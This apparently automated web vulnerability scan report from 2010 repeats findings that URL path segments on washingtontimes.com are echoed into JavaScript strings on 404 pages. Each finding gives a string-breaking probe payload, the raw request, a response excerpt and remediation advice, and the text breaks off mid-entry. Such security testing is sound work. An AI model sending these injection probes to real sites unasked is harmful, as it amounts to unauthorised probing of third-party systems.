GET /multimediab4f2b"%3b69f3641b902/collection/redskins-fall-tampa-17-16/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14766 Date: Mon, 13 Dec 2010 21:35:39 GMT X-Varnish: 570587141 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimediab4f2b";69f3641b902"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d513a'%3b706034b269f was submitted in the REST URL parameter 1. This input was echoed as d513a';706034b269f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediad513a'%3b706034b269f/collection/students-protest-british-tuition-hike-plan/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14584 Date: Mon, 13 Dec 2010 21:36:44 GMT X-Varnish: 570588824 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcb2b"%3b7e35a163e9e was submitted in the REST URL parameter 1. This input was echoed as dcb2b";7e35a163e9e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediadcb2b"%3b7e35a163e9e/collection/students-protest-british-tuition-hike-plan/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14759 Date: Mon, 13 Dec 2010 21:36:36 GMT X-Varnish: 570588606 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimediadcb2b";7e35a163e9e"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28988'%3bbf2088cd9ba was submitted in the REST URL parameter 1. This input was echoed as 28988';bf2088cd9ba in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia28988'%3bbf2088cd9ba/collection/sweden-bombing-suspect-named/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14598 Date: Mon, 13 Dec 2010 21:36:05 GMT X-Varnish: 570587730 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eb27"%3bcf2a1768b3f was submitted in the REST URL parameter 1. This input was echoed as 5eb27";cf2a1768b3f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia5eb27"%3bcf2a1768b3f/collection/sweden-bombing-suspect-named/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14598 Date: Mon, 13 Dec 2010 21:36:02 GMT X-Varnish: 570587648 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimedia5eb27";cf2a1768b3f"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24a91'%3b70ac571c839 was submitted in the REST URL parameter 1. This input was echoed as 24a91';70ac571c839 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia24a91'%3b70ac571c839/image/todays-newspaper-dec-13-2010/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14584 Date: Mon, 13 Dec 2010 21:36:22 GMT X-Varnish: 570588216 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f39b8"%3b6655f0ddbd4 was submitted in the REST URL parameter 1. This input was echoed as f39b8";6655f0ddbd4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediaf39b8"%3b6655f0ddbd4/image/todays-newspaper-dec-13-2010/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14625 Date: Mon, 13 Dec 2010 21:36:20 GMT X-Varnish: 570588160 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimediaf39b8";6655f0ddbd4"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44370"%3b2069bef9b29 was submitted in the REST URL parameter 1. This input was echoed as 44370";2069bef9b29 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news44370"%3b2069bef9b29/2010/dec/12/us-free-traders-sour-on-china/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14544 Date: Mon, 13 Dec 2010 21:27:57 GMT X-Varnish: 570576678 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... script"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="news44370";2069bef9b29"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8d81'%3b6d52a2a45b0 was submitted in the REST URL parameter 1. This input was echoed as a8d81';6d52a2a45b0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsa8d81'%3b6d52a2a45b0/2010/dec/12/us-free-traders-sour-on-china/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14712 Date: Mon, 13 Dec 2010 21:28:07 GMT X-Varnish: 570576928 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40cfb'%3b49bc6e52f6a was submitted in the REST URL parameter 1. This input was echoed as 40cfb';49bc6e52f6a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news40cfb'%3b49bc6e52f6a/inside-the-beltway/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14735 Date: Mon, 13 Dec 2010 21:26:02 GMT X-Varnish: 570574664 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5f69"%3bb06abe34d4 was submitted in the REST URL parameter 1. This input was echoed as c5f69";b06abe34d4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsc5f69"%3bb06abe34d4/inside-the-beltway/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14700 Date: Mon, 13 Dec 2010 21:25:45 GMT X-Varnish: 570574126 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... script"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="newsc5f69";b06abe34d4"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff9ee"%3b009790cd52a was submitted in the REST URL parameter 1. This input was echoed as ff9ee";009790cd52a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsff9ee"%3b009790cd52a/inside-the-ring/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14735 Date: Mon, 13 Dec 2010 21:26:22 GMT X-Varnish: 570574882 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... script"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="newsff9ee";009790cd52a"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 734fd'%3b2bdbff600b5 was submitted in the REST URL parameter 1. This input was echoed as 734fd';2bdbff600b5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news734fd'%3b2bdbff600b5/inside-the-ring/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14729 Date: Mon, 13 Dec 2010 21:26:36 GMT X-Varnish: 570575350 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab331'%3bddfbae649df was submitted in the REST URL parameter 1. This input was echoed as ab331';ddfbae649df in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsab331'%3bddfbae649df/pruden-on-politics/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14571 Date: Mon, 13 Dec 2010 21:27:22 GMT X-Varnish: 570576208 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b797"%3b7b7d238c6b8 was submitted in the REST URL parameter 1. This input was echoed as 6b797";7b7d238c6b8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news6b797"%3b7b7d238c6b8/pruden-on-politics/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14571 Date: Mon, 13 Dec 2010 21:27:09 GMT X-Varnish: 570575941 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... script"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="news6b797";7b7d238c6b8"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 126f6"%3b150397f1160 was submitted in the REST URL parameter 1. This input was echoed as 126f6";150397f1160 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion126f6"%3b150397f1160/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14583 Date: Mon, 13 Dec 2010 21:29:52 GMT X-Varnish: 570579193 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opinion126f6";150397f1160"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 475e0'%3bd66702a4c48 was submitted in the REST URL parameter 1. This input was echoed as 475e0';d66702a4c48 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion475e0'%3bd66702a4c48/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14774 Date: Mon, 13 Dec 2010 21:30:01 GMT X-Varnish: 570579547 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f466a"%3bf9c7ac7f854 was submitted in the REST URL parameter 1. This input was echoed as f466a";f9c7ac7f854 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionf466a"%3bf9c7ac7f854/blankley/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14610 Date: Mon, 13 Dec 2010 21:30:29 GMT X-Varnish: 570580097 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opinionf466a";f9c7ac7f854"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cf15'%3bbd45ecbbe80 was submitted in the REST URL parameter 1. This input was echoed as 1cf15';bd45ecbbe80 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion1cf15'%3bbd45ecbbe80/blankley/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14774 Date: Mon, 13 Dec 2010 21:30:40 GMT X-Varnish: 570580335 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6352f"%3b12782a90771 was submitted in the REST URL parameter 1. This input was echoed as 6352f";12782a90771 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion6352f"%3b12782a90771/commentary/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14774 Date: Mon, 13 Dec 2010 21:28:01 GMT X-Varnish: 570576985 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opinion6352f";12782a90771"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d1c6'%3bd1057e2bcfb was submitted in the REST URL parameter 1. This input was echoed as 3d1c6';d1057e2bcfb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion3d1c6'%3bd1057e2bcfb/commentary/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14774 Date: Mon, 13 Dec 2010 21:28:02 GMT X-Varnish: 570577034 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fa50'%3b12579fa5c89 was submitted in the REST URL parameter 1. This input was echoed as 6fa50';12579fa5c89 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion6fa50'%3b12579fa5c89/decker/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14583 Date: Mon, 13 Dec 2010 21:28:46 GMT X-Varnish: 570577935 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99e83"%3b5c06b0c9a1e was submitted in the REST URL parameter 1. This input was echoed as 99e83";5c06b0c9a1e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
